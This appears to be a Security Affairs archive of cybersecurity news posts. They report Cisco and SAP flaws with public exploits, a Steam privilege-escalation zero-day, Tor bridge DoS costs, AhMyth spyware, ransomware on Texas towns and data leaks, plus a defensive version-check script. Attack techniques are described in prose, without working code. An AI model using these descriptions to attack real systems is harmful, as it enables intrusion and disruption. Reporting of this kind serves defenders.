Category Archives: Pierluigi Paganini

Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency

The Ukrainian Secret Service is investigating the case of employees at a nuclear power plant who connected its systems to the Internet to mine cryptocurrency.

The Ukrainian Secret Service (SBU) launched an investigation after employees at a local nuclear power plant connected some systems of the internal network to the Internet to mine cryptocurrency.

The incident was first reported by the Ukrainian news site UNIAN.

Nuclear power plants are critical infrastructure, and an incident of this kind could expose highly sensitive information.

The security incident happened in July at the South Ukraine Nuclear Power Plant at Yuzhnoukrainsk, in the south of the country.

On July 10, agents of the SBU raided the nuclear power plant and discovered the equipment used by the employees to mine cryptocurrency.

The equipment was found in the power plant’s administration offices.

The Ukrainian authorities are currently investigating whether attackers could have used the exposed systems to access information that could threaten national security.

The SBU seized equipment consisting of two metal cases containing coolers and video cards (Radeon RX 470 GPUs), computer components commonly used in mining farms.

“Further, the SBU also found and seized additional equipment that looked like mining rigs in the building used as barracks by a military unit of the National Guard of Ukraine, tasked with guarding the power plant.” reported ZDNet.

The authorities have charged several employees, but at the time of writing none had been arrested.

In February 2018, a similar incident took place in Russia. Russian authorities arrested some employees at the Russian Federation Nuclear Center facility because they were suspected of trying to use a supercomputer at the plant to mine Bitcoin.

In April 2018, an employee at the Romanian National Research Institute for Nuclear Physics and Engineering abused the institute’s electrical network to mine cryptocurrency.

Pierluigi Paganini

(SecurityAffairs – nuclear power plant, hacking)

The post Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency appeared first on Security Affairs.

Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches

Cisco has updated the security advisories for three flaws affecting Cisco Small Business 220 Series Smart Switches that were patched in early August.

Cisco has updated the security advisories for three vulnerabilities in Cisco Small Business 220 Series Smart Switches that were patched in early August. The three vulnerabilities were reported by the security researcher Pedro Ribeiro, aka ‘bashis’, via Cisco’s VDOO Disclosure Program.

According to the Cisco Product Security Incident Response Team (PSIRT), public exploit code for these flaws is available online.

Cisco Small Business 220 Series Smart Switches

One of the vulnerabilities is a critical remote code execution flaw, tracked as CVE-2019-1913; an attacker could exploit it to execute arbitrary code with root privileges on the underlying operating system.

“Multiple vulnerabilities in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to overflow a buffer, which then allows the execution of arbitrary code with root privileges on the underlying operating system.” reads the security advisory.

“The vulnerabilities are due to insufficient validation of user-supplied input and improper boundary checks when reading data into an internal buffer. An attacker could exploit these vulnerabilities by sending malicious requests to the web management interface of an affected device. Depending on the configuration of the affected switch, the malicious requests must be sent via HTTP or HTTPS.”

Another flaw is an authentication bypass security flaw tracked as CVE-2019-1912 that resides in the web management interface of Cisco Small Business 220 Series Smart Switches. The flaw could be exploited by an attacker to modify the configuration of an affected device or to inject a reverse shell.

“A vulnerability in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to upload arbitrary files.” reads the security advisory.

“The vulnerability is due to incomplete authorization checks in the web management interface. An attacker could exploit this vulnerability by sending a malicious request to certain parts of the web management interface. Depending on the configuration of the affected switch, the malicious request must be sent via HTTP or HTTPS. A successful exploit could allow the attacker to modify the configuration of an affected device or to inject a reverse shell.”

The third flaw is a command injection vulnerability, tracked as CVE-2019-1914, that an authenticated, remote attacker could exploit to inject arbitrary commands.

The good news is that Cisco is not aware of attacks exploiting the above issues.

“The Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code. Cisco PSIRT is not aware of malicious use of the vulnerability that is described in this advisory.” states Cisco.

Cisco also released security patches to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products (UCS) and Integrated Management Controller (IMC).

For these flaws too, Cisco confirmed it is not aware of attacks in the wild that have exploited them.

Pierluigi Paganini

(SecurityAffairs – Cisco Small Business, hacking)

Cisco addressed several vulnerabilities in UCS products

Cisco released security patches to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products (UCS and IMC).

Cisco has released security fixes to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products.

Most of the flaws affect the Integrated Management Controller (IMC), a baseboard management controller that provides embedded server management for Cisco Unified Computing System (UCS) servers.

The critical flaws impacting Cisco UCS addressed by the tech giant are CVE-2019-1937, CVE-2019-1974, CVE-2019-1935 and CVE-2019-1938. These flaws could be exploited by remote, unauthenticated attackers to gain elevated privileges, including administrator permissions, on the targeted system.

A remote attacker could exploit the vulnerabilities by sending specially crafted requests and abusing default credentials.

“A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker to acquire a valid session token with administrator privileges, bypassing user authentication.” reads the advisory for the CVE-2019-1937 flaw.

“The vulnerability is due to insufficient request header validation during the authentication process. An attacker could exploit this vulnerability by sending a series of malicious requests to an affected device. An exploit could allow the attacker to use the acquired session token to gain full administrator access to the affected device.”

Cisco also addressed multiple high-severity vulnerabilities that could be exploited to trigger a denial-of-service (DoS) condition, execute arbitrary commands with root privileges, obtain sensitive configuration data, elevate privileges, and modify the system configuration.

Some of the flaws addressed by Cisco have been reported by the security researcher Pedro Ribeiro, aka “bashis,” another expert whose identity was not revealed, and some other external researchers.

The good news is that Cisco is not aware of attacks in the wild that have exploited the flaws in UCS and IMC products.

Pierluigi Paganini

(SecurityAffairs – Cisco Unified Computing Products, hacking)

App tainted with AhMyth open-source spyware appeared on Google Play Store twice

ESET experts discovered that an Android app infected with AhMyth open-source RAT has bypassed the security of Google Play twice over two weeks.

The popular malware researcher Lukas Stefanko from ESET discovered that spyware built on the AhMyth open-source espionage tool was uploaded to Google Play twice over two weeks, bypassing Google’s security checks.

The malicious app, named Radio Balouch (or RB Music), includes functionality from AhMyth Android RAT.

RB Music is a streaming app for Balouchi music, traditional in the Balochistan region of south-western Asia.

“ESET researchers have discovered the first known spyware that is built on the foundations of AhMyth open-source malware and has circumvented Google’s app-vetting process. The malicious app, called Radio Balouch aka RB Music, is actually a fully working streaming radio app for Balouchi music enthusiasts, except that it comes with a major sting in its tail – stealing personal data of its users.” wrote Stefanko. “The app snuck into the official Android app store twice, but was swiftly removed by Google both times after we alerted the company to it.”

The source code of the RAT has been available on GitHub since October 2017.

According to ESET experts, this is the first case of malicious apps built on AhMyth that spread through the official Google store bypassing Google’s app-vetting mechanism.

The app is able to steal contacts, harvest files stored on the device and send SMS messages from the affected device. It also implements a feature to steal SMS messages stored on the device, but this functionality can’t be utilized since Google’s recent restrictions only allow the default SMS app to access those messages.

Stefanko pointed out that the AhMyth code inside the app was not obfuscated or protected, making it very easy to detect, yet Google failed to catch it.

The experts discovered two different versions of the malicious Radio Balouch app on Google Play; the application had 100 downloads.

The researchers first discovered the app on Google Play on July 2, 2019, and it was removed within 24 hours. The Radio Balouch app reappeared on Google Play on July 13, 2019; ESET discovered it and alerted Google, which quickly removed it.

The malicious app was also distributed via third-party app stores and via a dedicated website, radiobalouch[.]com, whose link was promoted through a related Instagram account. The expert discovered that the same server was also used for the spyware’s C&C communications. The domain was registered on March 30, 2019, and after the ESET report it was taken down by the threat actors.

Once executed, the app asks users to choose their preferred language (English or Farsi), then starts requesting permissions such as access to files on the device and access to contacts.

“Then, the app requests the permission to access contacts. Here, to camouflage its request for this permission, it suggests this functionality is necessary should the user decide to share the app with friends in their contact list. If the user declines to grant the contact permissions, the app will work regardless.” continues the report.

After the setup, the malicious app displays its home screen with music options and allows users to register and log in. This feature is fake: the user is authenticated whatever input is provided. Experts believe this feature was implemented to harvest credentials from victims and try to break into other services that share the same credentials.

“The (repeated) appearance of the Radio Balouch malware on the Google Play store should serve as a wake-up call to both the Google security team and Android users. Unless Google improves its safeguarding capabilities, a new clone of Radio Balouch or any other derivative of AhMyth may appear on Google Play.” Stefanko concludes.

“While the key security imperative “Stick with official sources of apps” still holds, it alone can’t guarantee security. It is highly recommended that users scrutinize every app they intend to install on their devices and use a reputable mobile security solution.”

Pierluigi Paganini

(SecurityAffairs – ahMyth, spyware)

The Dangers of Using Unsecured Wi-Fi Networks

Isn’t public Wi-Fi great? If you’re having a tea or coffee in a cafe or restaurant you can check your emails and social media.

If you’re waiting for a flight, what better way to pass the time than logging onto your favourite website, checking your bank account or even doing a bit of online shopping? And you don’t have to pay a penny or cent. It’s free and you’re not eating into your data allowance.

Except there’s a problem. Public Wi-Fi is notoriously insecure. Data that travels over a public hotspot network is rarely encrypted. This means that every time you use public Wi-Fi, anybody who is looking can see everything you are doing. They can see the passwords you use, your email address, your name and physical address, phone numbers and any other type of personal information that you might happen to enter into a website. They can certainly see the websites you are visiting.

This information is gold dust to cyber criminals. It enables them to access and rake through your emails, target you with specific phishing mails, call you with targeted messages and even capture and exploit your payment card details if you happened to buy something online when using public Wi-Fi.

Hackers capture this unencrypted network traffic by interfering with the public Wi-Fi or by creating an ‘evil twin’ fake network which looks legitimate but has actually been set up by the hacker. Because attackers are typically silently observing the public Wi-Fi traffic, these attacks are difficult to spot.

  • An attacker could see that a user is accessing a banking site and redirect them to a fake website they have set up that emulates the legitimate site.
  • Attackers can also push users into making a so-called ‘important’ download or update, which is actually a Trojan horse planting malware on the device.

These attacks can also be easily automated. For instance, there are automated tools that look for passwords and write them into a file whenever they see one. There are automated attacks that wait for particular requests, such as accessing Amazon.com, designed to scoop up usernames and passwords.

In the name of self defence

These attacks aren’t theoretical. Hotels are a favorite target, especially during the holidays, but so are shopping malls, airports, cafes and different types of transport stations.

So what can you do to protect yourself? The answer is a virtual private network (VPN), which creates a private tunnel between your device and the internet and encrypts your data. It essentially locks down your network traffic so no one can see what you are doing when you use public Wi-Fi.

BullGuard VPN, for instance, uses military grade encryption which would take more than a lifetime to crack. When confronted with this level of protection, hackers simply move on.

Further, it also protects you from other types of snooping, whether it’s companies trying to track your movements or even governments spying on their citizens. In short, you reclaim your privacy and can use the internet with total freedom and safety, even on public Wi-Fi.

About the Author

Susan Alexandra is a cybersecurity and privacy enthusiast. She writes for publications like GlobalSign, Tripwire, SecurityAffairs, SecurityToday and CyberDefenseMagazine. She is a small business owner, traveler and investor in cryptocurrencies. Susan’s inbox is open for new ideas and stories; feel free to share story ideas at susanalexandra67@gmail.com

Pierluigi Paganini

(SecurityAffairs – Wi-Fi, hacking)

Texas attackers demand $2.5 million to allow towns to access encrypted data

Crooks behind the attacks against Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The cybercriminals behind the wave of attacks that hit 23 Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The attacks started on the morning of August 16, and security experts investigating the incidents believe it was a coordinated attack carried out by a single cybercrime gang.

Initially, it was said that at least 23 local government organizations were impacted by the ransomware attacks. The Department of Information Resources (DIR) is still investigating them and providing support to mitigate the attacks; evidence continues to point to a single threat actor.

The State Operations Center (SOC) was where the attacks were detected.

According to the Texas Department of Information Resources (DIR) the number of impacted towns has been reduced to 22.

“As of the time of this release, responders have engaged with all twenty-two entities to assess the impact to their systems and bring them back online.” reads an update provided by the DIR.

“More than twenty-five percent of the impacted entities have transitioned from response and assessment to remediation and recovery, with a number of entities back to operations as usual.”

The city of Keene confirmed the attack and announced it is working with law enforcement to resolve a cyber incident.

Another of the towns hit by the ransomware attack, the City of Borger, confirmed that business and financial operations and services were impacted, although basic and emergency services continued to be operational.

“On the morning of August 16, 2019 the City of Borger was one of more than 20 entities in Texas that reported a ransomware attack.” reads the press release published by the City of Borger.

“Currently, Vital Statistics (birth and death certificates) remains offline, and the City is unable to take utility or other payments. Until such time as normal operations resume, no late fees will be assessed, and no services will be shut off.”

Keene Mayor Gary Heinrich told NPR the attackers are asking for $2.5 million to unlock the files.

“Well, just about everything we do at City Hall is impacted” Heinrich said.

“They got into our software provider, the guys who run our IT systems. A lot of folks in Texas use providers to do that, because we don’t have a staff big enough to have IT in house.”

Unfortunately, ransomware attacks are a big problem for US government and city offices; recently several cities in Florida were victims of hackers, including Key Biscayne, Riviera Beach and Lake City.

In June, the city of Riviera Beach agreed to pay $600,000 in ransom to decrypt its data after a ransomware attack hit its computer systems. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Pierluigi Paganini

(SecurityAffairs – Texas, ransomware)

A new Zero-Day in Steam client impacts over 96 million Windows users

A new zero-day vulnerability in the Steam client for Windows, impacting over 96 million users, was disclosed by researcher Vasily Kravets.

A new zero-day flaw in the Steam client for Windows impacts over 96 million users. It is a privilege escalation vulnerability and has been publicly disclosed by researcher Vasily Kravets.

Kravets is one of the researchers who discovered the first zero-day flaw in the Steam client for Windows. Valve initially addressed that issue, but researcher Xiaoyin Liu disclosed a bypass of Valve’s fix that re-enabled it.

Valve did not award Kravets and banned him from its bug bounty program.

Kravets decided to publicly disclose the privilege escalation flaw, which attackers could exploit to run executables with the privileges of the Steam Client Service, which runs as NT AUTHORITY\SYSTEM.

The expert explained that he used BaitAndSwitch, a technique that combines the creation of links and oplocks to win a TOCTOU (time-of-check/time-of-use) race.

The attack scenario sees hackers getting remote code execution privileges by exploiting a vulnerability in a Steam game, a Windows app, or the OS itself, then elevating privileges by triggering this second zero-day to run a malicious payload using SYSTEM permissions.

“As a result any code could be executed with maximum privileges, this vulnerability class is called «escalation of privileges» (eop) or «local privilege escalation» (lpe). Despite any application itself could be harmful, achieving maximum privileges can lead to much more disastrous consequences.” wrote Kravets. “For example, disabling firewall and antivirus, rootkit installation, concealing of process-miner, theft any PC user’s private data — is just a small portion of what could be done.”

Kravets published two PoC videos for this second zero-day flaw in the Steam client for Windows. He demonstrated two methods that attackers could use to gain SYSTEM permissions on any Windows system running an unpatched Steam version.

Pierluigi Paganini

(SecurityAffairs – Steam client, zero-day)

DoS attacks against most used default Tor bridges could be very cheap

Researchers explained that carrying out attacks against the most used default Tor bridges would cost threat actors $17,000 per month.

According to security researchers Rob Jansen from the U.S. Naval Research Laboratory, and Tavish Vaidya and Micah Sherr from Georgetown University, launching denial-of-service (DoS) attacks against most commonly used default Tor bridges would cost attackers $17,000 per month.

DoS attacks could be used to prevent users from accessing the popular anonymizing network, or to support attacks that de-anonymize Tor users with techniques such as traffic correlation.

For a modest sum, threat actors could target Tor bridges, saturating their resources and significantly degrading network performance.

In a research paper presented at the 2019 USENIX Security Symposium, the experts explained that targeting the entire Tor network with a DoS attack would be very expensive, costing millions of dollars each month, but targeted attacks against specific Tor bridges are economically feasible.

“First, we explore an attack against Tor’s most commonly used default bridges (for censorship circumvention) and estimate that flooding those that are operational would cost $17K/mo. and could reduce client throughput by 44% while more than doubling bridge maintenance costs. Second, we explore attacks against the TorFlow bandwidth measurement system and estimate that a constant attack against all TorFlow scanners would cost $2.8K/mo. and reduce the median client download rate by 80%.” reads the paper. “Third, we explore how an adversary could use Tor to congest itself and estimate that such a congestion attack against all Tor relays would cost $1.6K/mo. and increase the median client download time by 47%. Finally, we analyze the effects of Sybil DoS and deanonymization attacks that have costs comparable to those of our attacks.”

The experts estimate that the total link capacity across the Tor network ranged from 429 to 575 Gbit/s over the year; for their research, they used the average of 512.73 Gbit/s. At that capacity, an attacker using a DoS stresser service to hit every Tor relay would spend around $10,000 per hour, or $7.2 million per month.

An attack on Tor’s most commonly used default bridges, flooding them, would only cost around $17,000 per month; in this way the attackers could reduce client throughput by 44% and more than double bridge maintenance costs.

An attack aimed at all scanners in the TorFlow bandwidth measurement system would cost $2,800 per month and reduce the median client download rate by 80%.

The experts found that threat actors could use Tor to congest itself; such an attack would cost $1,600 per month and increase the median client download time by 47%.

In order to examine the performance of the network’s bridges, the experts focused on 25 default bridges that use the obfs4 obfuscation protocol, because most Tor bridge users rely on default bridges and obfs4.

“To test their performance, we use a modified version of Tor to download a 6 MiB file through each bridge. Surprisingly, we find that only 48% (12/25) of the obfs4 default bridges included in Tor Browser Bundle (TBB) are operational.” the experts continue. “The Tor Browser Bundle (TBB) includes a set of 38 hard-coded default bridges (as of version 8.0.3). Users who cannot directly access Tor relays can configure TBB to connect via one of these default bridges.”

To compare against the performance of unlisted bridges, the experts requested 135 unlisted obfs4 bridges from the Tor Project’s bridge authority via its web and email interfaces. 95 of the acquired unlisted bridges were found to be functional.

The researchers estimate that the cost of a DoS attack against all 38 default bridges would be around $31,000 per month. Considering that nation-state actors could be interested in targeting these default Tor bridges, this budget could be a good investment for them.

Experts explained that considering that 90% of bridge traffic passes through default bridges, forcing it to unlisted bridges could have a significant impact on network performance.

Tor bridges attacks

The study also compared the presented attack scenarios with launching a Sybil DoS attack, where the adversary could run Sybil relays and then arbitrarily degrade traffic performance or deny service by dropping circuits, or de-anonymize users by observing both the entry and exit points in a vulnerable circuit, and concludes that attacks on Tor bridges are more flexible and less expensive.

“On the positive side, we find that Tor’s growth has made it more resilient at least to simple attacks: disrupting the service by naïvely flooding Tor relays using stresser services is an expensive proposition and requires $7.2M/month. Unfortunately, however, several aspects of Tor’s design and rollout make it susceptible to more advanced attacks.” the researchers conclude. “We find that Tor’s bridge infrastructure is heavily dependent on a small set of fixed default bridges, the operational of which can be disrupted at a cost of $17K/month”

Further technical details on the attack techniques are reported in the interesting analysis published by the experts.

Pierluigi Paganini

(SecurityAffairs – Tor bridges, hacking)

The Cost of Dealing With a Cybersecurity Attack in These 4 Industries

A cybersecurity issue can cause unexpected costs in several different areas. What is the cost of dealing with an attack in these 4 industries?

A cybersecurity issue can cause unexpected costs in several different areas. In addition to the monetary costs associated with things like lost productivity and improving network security to reduce the likelihood of future incidents, affected companies have to deal with the costs tied to reduced customer trust and damaged reputations.

It’s not always easy or straightforward to pinpoint the overall costs of recovering from a cyberattack. The totals also vary by industry. However, here’s some research that illuminates the various financial impacts for these four sectors.

1. Health Care

Health care is particularly vulnerable to cyberattacks. Criminals are aware that facilities typically handle large numbers of records containing exceptionally in-demand information that is 10 times more valuable on the black market than a credit card number. A report from Carbon Black showed that two-thirds of respondents said cyberattacks had gotten more sophisticated over the past year, too.

A victimized health care organization spends an average of $1.4 million to recover from a cyber incident. It also doesn’t help that many health care organizations are not promptly aware of cyberattacks. Experts say that most organizations don’t discover active cyberattacks for at least 18 months.

The longer an attack progresses without detection, the more costly the damage will likely be to fix. And, the costs go up if the health care facility does not have a cybersecurity response plan to use after an attack gets identified.

2. Retail

As people have growing opportunities to shop online, the chances for hackers to carry out lucrative cyberattacks in the retail sector also go up. Statistics from 2016 showed that the average cost per compromised retail record was $172. Some of the costs relate to hiring consultants to get to the bottom of breaches and paying fines to payment processors or credit card brands for insufficient security.

People are becoming less tolerant of retailers that have widescale data breaches. Additionally, the convenience and choice offered by online shopping increase the likelihood that if a person stops doing business with one retailer, they can probably find what they need elsewhere.

3. Manufacturing

The manufacturing industry was not always known to embrace connected technology, but that’s changing. Many brands recognize that keeping their machines connected to the internet can assist them with tracking trends, avoiding downtime and more.

One of the reasons why it’s tough to calculate a straightforward figure for cyberattacks is that there are so many related costs that may not be immediately apparent. For example, manufacturing companies can expect a cyberattack itself to cost about $1.7 million. But, other expenses can quickly stack up, including those related to lost productivity, customer churn and the need to hire extra staff members to help with cleaning up after a cyberattack.

Analysts also say that the manufacturing industry is extremely attractive to hackers. In addition to planning attacks that cause supply chain disruptions, cybercriminals may target manufacturing entities as part of nation-state attacks. Although those make up a small percentage of overall attacks, they took 500 times longer to resolve in 2017 than the previous year.

4. Finance

The very nature of the financial industry and the money it handles make the sector ripe for a cyberattack. It also tops the list of annual cybercrime costs at about $18 million.

But, the costs also vary depending on the type of attack a financial brand suffers. A report published collaboratively by two organizations showed that the average cost of a malware attack for a financial brand was $825,000. But, the expenses climb dramatically for a distributed denial of service (DDoS) attack. The expenses of those incidents are approximately $1.8 million.

The numbers of attacks on the financial industry are going up, too. Research associated with entities in the United Kingdom confirmed a five-fold increase of reported hacks on financial institutions in 2018 compared to 2017. That trend suggests that financial institutions have to be especially vigilant to protect against future attacks. Doing so often requires substantial financial resources.

Moving in a Worrying Direction

This list gives industry-specific snapshots of cybersecurity costs. But even sectors that are not on this list should be concerned about potential losses: many cybersecurity experts agree that the cost of cyberattacks in general is steadily rising.

The growing sophistication of cybercriminals’ tactics also drives up the expense and effort required for resolution.

Dealing with the initial aftermath of an attack is only the beginning. Companies also have to assure customers that they’ve taken steps to prevent other problems — and stay committed to that promise.

All of these aspects require significant financial investments, as well as a recognition that cyberattacks are genuine threats to tackle.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post The Cost of Dealing With a Cybersecurity Attack in These 4 Industries appeared first on Security Affairs.

Thousands credit card numbers of MoviePass customers were exposed online

A security expert discovered that the popular movie ticket subscription service MoviePass exposed thousands of customer card numbers and personal credit card numbers.

Security expert Mossab Hussein from cybersecurity firm SpiderSilk discovered that MoviePass exposed a database containing the credit card data on one of its subdomains. The archive contained 161 million records, and the amount of data was growing in real time.

The researcher discovered that the records in the database were not encrypted.

The database included both data logs and sensitive user data, such as customer card numbers. According to TechCrunch, which analyzed a sample of 1,000 records, the data is authentic.

“We reviewed a sample of 1,000 records and removed the duplicates. A little over half contained unique MoviePass debit card numbers. Each customer card record had the MoviePass debit card number and its expiry date, the card’s balance and when it was activated.” reported Techcrunch.


The archive contained more than 58,000 records including card data, and according to the expert, it was growing over time.

The unsecured database also contained customers’ personal credit card numbers and their expiry dates, along with billing information (names and postal addresses). In some cases, the available data could expose cardholders to fraud.

Logged data included email addresses and incorrectly typed passwords.

Hussein attempted to report his discovery to MoviePass but did not receive any reply. The database was taken offline after TechCrunch reported the issue to the company.

TechCrunch reported that security firm RiskIQ first detected the exposed archive in late June, so the database may have been exposed for months.

“We keep on seeing companies of all sizes using dangerous methods to maintain and process private user data,” Hussein told TechCrunch. “In the case of MoviePass, we are questioning the reason why would internal technical teams ever be allowed to see such critical data in plaintext — let alone the fact that the data set was exposed for public access by anyone.”

Pierluigi Paganini

(SecurityAffairs – data leak, hacking)

The post Thousands credit card numbers of MoviePass customers were exposed online appeared first on Security Affairs.

Cyber Defense Magazine – May 2019 has arrived. Enjoy it!

Cyber Defense Magazine May 2019 Edition has arrived. We hope you enjoy this month’s edition, packed with over 160 pages of excellent content.

Cyber Defense eMagazine for May 2019

Pierluigi Paganini

(SecurityAffairs – Cyber Defense Magazine, hacking)

The post Cyber Defense Magazine – May 2019 has arrived. Enjoy it! appeared first on Security Affairs.

Using the Human Factor in Cyber Attacks

The human factor is of fundamental importance to the success of a cyber attack; for this reason it is important to create a culture of cyber security within organizations.

Every day we see a large number of tools being deployed within enterprises and institutions to keep their environments more secure. With this deployment comes a series of responsibilities to ensure the resources are used efficiently and effectively, generating the results expected by analysts, managers and management. In a corporate environment we can find a number of tools, such as a Web Application Firewall (WAF), Intrusion Prevention System (IPS), antispam, antivirus, firewall, web filter / application control, DLP (Data Loss Prevention), switches, routers and so on. Each of these tools has its own characteristics and function within the corporate environment; when well configured, they generate results and metrics that help managers make decisions about environment/business growth, security improvement and more.

In recent years there has been a significant increase in cyber attacks and attempts to exploit vulnerabilities: attackers increasingly study CVEs (Common Vulnerabilities and Exposures) and use this knowledge to try to exploit, break into and exfiltrate data from companies or individuals. When implementing a security tool within a company, it is necessary to pay attention to some points that go beyond the implementation project, among them maintenance and updating of the tool following the manufacturer’s best practices. A very common error today, one that leaves many companies vulnerable to attacks, is that they only care about the tool during the implementation process; after that, the points mentioned above, which require constant attention throughout the tool’s life cycle inside the company, are forgotten, and the environment becomes susceptible to attacks and exploitation.

Some points that make environments vulnerable:

  • Old tools.
  • Outdated tools.
  • Poor resource management.
  • Human factor.

Of the points mentioned above, I would like to draw attention to the ‘Human Factor’. With technological growth, it has become fundamental to create a culture of security policy in the day-to-day work of employees. Companies are investing more and more in lectures, training and workshops to reduce the chance that an attack or intrusion is caused by the human factor.

The human factor can be illustrated as follows: the attacker sends an email with a supposed advertisement or promotion containing a link that will direct the user to this “promotion”, when in fact it is a malicious link (this attack is called phishing). The user may be infected with malware, and from that machine the attacker gains internal access and begins lateral movement in an attempt to exploit or compromise the company environment. Every day we see research by tool makers showing that most of the attacks that occur still involve the human factor, that is, a user who is not prepared to identify some simple types of attack, such as phishing, and who can compromise the entire security of the company.

There are currently three most commonly used types of phishing attack:

  • Mass-scale phishing: an attack where fraudsters launch an extensive network of attacks that are not highly targeted.
  • Spear phishing: tailor-made for a specific victim or group of victims using personal details.
  • Whaling: a specialized type of spear phishing that targets a “large” victim within a company, for example the CEO, CFO or another executive.

Below is the anatomy of a phishing attack:

(image: anatomy of a phishing attack)

About the author: Zoziel Freire

Cyber Security Analyst and content writer for the portal www.infosectrain.com. Malicious document analyst. CompTIA Security Analytics Professional, LPIC-3 Enterprise Linux Professional, CompTIA Cybersecurity Analyst.
LinkedIn: https://www.linkedin.com/in/zozielfreire/
Twitter: https://twitter.com/zoziel

Pierluigi Paganini

(SecurityAffairs – Human Factor, cybersecurity)

The post Using the Human Factor in Cyber Attacks appeared first on Security Affairs.

Cisco addresses a critical flaw in Nexus 9000 switches

Cisco released security patches to address dozens of vulnerabilities in its products, including a critical vulnerability affecting Nexus 9000 switches.

Cisco released security patches to address dozens of vulnerabilities in its products. Among the flaws fixed by Cisco there is a critical vulnerability in Nexus 9000 switches, tracked as CVE-2019-1804, that received a CVSS score of 9.8.

The vulnerability resides in the SSH key management of the Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software and is due to the presence of a default SSH key pair in all devices.

An attacker could exploit the default SSH key pair by opening an SSH connection via IPv6 to a targeted device; in this way the attacker is able to connect to the system with the privileges of the root user.

“A vulnerability in the SSH key management for the Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software could allow an unauthenticated, remote attacker to connect to the affected system with the privileges of the root user.” reads the security advisory published by Cisco.

“The vulnerability is due to the presence of a default SSH key pair that is present in all devices. An attacker could exploit this vulnerability by opening an SSH connection via IPv6 to a targeted device using the extracted key materials. An exploit could allow the attacker to access the system with the privileges of the root user.”

The flaw is not exploitable over IPv4.

The flaw affects Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode running Cisco NX-OS software release prior to 14.1(1i).
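An inventory check for the affected-version condition stated above, written for this post as an added example (it is not Cisco tooling): it parses the "major.minor(maintenance+letter)" release string quoted in the article and flags switches running anything earlier than 14.1(1i). The release-string layout and the hostnames in the inventory are assumptions.

```python
"""Flag Nexus 9000 ACI-mode switches whose NX-OS release predates the fix."""
import re

# Fixed release named in the advisory; anything sorting before it is affected.
FIXED_RELEASE = "14.1(1i)"
# Assumed layout: major.minor(maintenance[letter]), e.g. 14.1(1i) or 13.2(3n).
RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\((\d+)([a-z]?)\)$")


def parse_release(release):
    """'14.1(1i)' -> (14, 1, 1, 'i'); raises ValueError on an unknown layout."""
    m = RELEASE_RE.match(release.strip())
    if not m:
        raise ValueError("unrecognised release string: %r" % release)
    major, minor, maint, letter = m.groups()
    return (int(major), int(minor), int(maint), letter)


def is_affected(release, fixed=FIXED_RELEASE):
    """True when the running release sorts strictly before the fixed release."""
    return parse_release(release) < parse_release(fixed)


def triage(inventory):
    """inventory: {switch_name: release}; returns the names still needing the patch.

    Releases that cannot be parsed are listed too, so nothing is silently skipped."""
    needs_patch = []
    for name, release in sorted(inventory.items()):
        try:
            if is_affected(release):
                needs_patch.append(name)
        except ValueError:
            needs_patch.append(name + " (unparseable release, review manually)")
    return needs_patch


# Constructed inventory for demonstration (hostnames and releases are made up).
INVENTORY = {
    "aci-leaf-101": "13.2(3n)",
    "aci-leaf-102": "14.1(1i)",
    "aci-spine-201": "14.0(2c)",
    "aci-spine-202": "14.1(2g)",
    "aci-leaf-103": "n/a",
}

if __name__ == "__main__":
    for entry in triage(INVENTORY):
        print("needs CVE-2019-1804 fix:", entry)
```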

Users have to install the software update released by Cisco to address the flaw; no workaround is available.

The good news is that Cisco is not aware of any exploitation of the vulnerability in the wild.

Cisco also addressed over 20 High severity vulnerabilities affecting the Web Security Appliance (WSA), Umbrella Dashboard, Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software, RV320 and RV325 routers, IP Phone 7800 and 8800 Series, Application Policy Infrastructure Controller (APIC) software, and the Nexus 9000 switches.

The list of flaws includes privilege escalation issues, denial of service vulnerabilities and session hijacking bugs.

Pierluigi Paganini

(SecurityAffairs – Cisco Nexus 9000, hacking)

The post Cisco addresses a critical flaw in Nexus 9000 switches appeared first on Security Affairs.

10KBLAZE exploits could affect 9 out of 10 SAP installs of more than 50k customers

The availability of 10KBLAZE PoC exploits for an old SAP configuration issue poses a severe risk of attacks on business applications.

The risk of cyber attacks against SAP systems has increased after security researchers released PoC exploits for old SAP configuration flaws.

SAP Message Server and SAP Gateway implement an access control list (ACL) mechanism to determine which IP addresses are allowed to register application servers. An incorrect ACL configuration could allow any host with network access to the Message Server to register an application server.

In this scenario, an attacker with access to the network hosting the vulnerable systems could take full control of them.

Experts pointed out that the problem could impact many SAP products, including S/4HANA and NetWeaver Application Server (AS). The good news is that the most recent versions of SAP software are configured by default to drop unauthorized connections.

Since 2005, SAP has been providing instructions on how to configure an ACL for the Message Server. In 2005 the company released security note 821875, and in 2009 it released security note 1408081 containing instructions on how to properly configure the access list for the Gateway. In 2010 SAP released another note, 1421005, that provides instructions on the correct configuration of the Message Server ACL.

Despite the numerous notes, many organizations still fail to properly configure their SAP solutions. According to a report published in April 2018 by security firm Onapsis, 90 percent of SAP systems were impacted by a 13-year-old configuration vulnerability that affects SAP NetWeaver and that can be exploited by a remote unauthenticated attacker with network access to the system.

